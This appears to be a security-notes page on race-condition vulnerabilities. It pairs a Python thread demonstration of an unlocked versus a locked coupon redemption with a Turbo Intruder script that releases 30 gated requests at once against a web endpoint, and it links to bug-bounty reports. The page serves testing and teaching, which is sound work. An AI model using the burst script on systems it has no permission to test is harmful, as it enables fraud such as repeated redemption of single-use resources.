A race condition vulnerability occurs when the behavior or outcome of a system or program depends on the timing or sequence of events, and multiple processes or threads compete for shared resources or data. This can result in unexpected or erroneous behavior, including security vulnerabilities, if the processes or threads don't coordinate properly. For example, if two processes try to write to the same file at the same time, the file may end up with unexpected or corrupted data.
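The uncoordinated check-then-write described above, shown beside a locked version, as an added example that is not part of the original page. The `Coupon` class, its two redeem methods and the `race` helper are constructed for illustration, and the barrier that holds the window open is a test device that makes the worst-case interleaving reproducible.

```python
import threading
import time

class Coupon:
    """Constructed single-use coupon standing in for the shared resource."""
    def __init__(self):
        self.used = False
        self._lock = threading.Lock()

    def redeem_unsafe(self, window):
        # Check-then-act without coordination: every thread that passes the
        # check before the first write is allowed to redeem.
        if self.used:
            return False
        window()          # time gap between the check and the write
        self.used = True
        return True

    def redeem_safe(self, window):
        # Holding the lock makes the check and the write one atomic step.
        with self._lock:
            if self.used:
                return False
            window()
            self.used = True
            return True

def race(method_name, threads=30, hold_window_open=False):
    """Call one redeem method from many threads; return the success count."""
    coupon = Coupon()
    start = threading.Barrier(threads)    # release all workers together
    # Worst case for the unsafe path: nobody writes until everybody has checked.
    inside = threading.Barrier(threads)
    window = inside.wait if hold_window_open else (lambda: time.sleep(0.001))
    results = [False] * threads

    def worker(i):
        start.wait()
        results[i] = getattr(coupon, method_name)(window)

    pool = [threading.Thread(target=worker, args=(i,)) for i in range(threads)]
    for t in pool:
        t.start()
    for t in pool:
        t.join()
    return sum(results)

if __name__ == "__main__":
    print("unsafe:", race("redeem_unsafe", hold_window_open=True))
    print("safe:", race("redeem_safe"))
```

The same single-use guarantee in a web application usually comes from the data store, for example a conditional update or a unique constraint, rather than an in-process lock.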
Using Turbo Intruder, we can use the `race.py` script to send a request several times in an extremely short period of time:
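```python
# RequestEngine and table are provided by the Turbo Intruder runtime.
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=30,
                           pipeline=False
                           )

    for i in range(30):
        engine.queue(target.req, i)
        # A request queued with a gate is held back until openGate() is called
        engine.queue(target.req, target.baseInput, gate='race1')

    engine.start(timeout=5)
    # Release every request tagged 'race1' at the same time
    engine.openGate('race1')
    engine.complete(timeout=60)


def handleResponse(req, interesting):
    # Record every response in the results table
    table.add(req)
```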
{% embed url="https://hackerone.com/reports/759247" %}
{% embed url="https://pravinponnusamy.medium.com/race-condition-vulnerability-found-in-bug-bounty-program-573260454c43" %}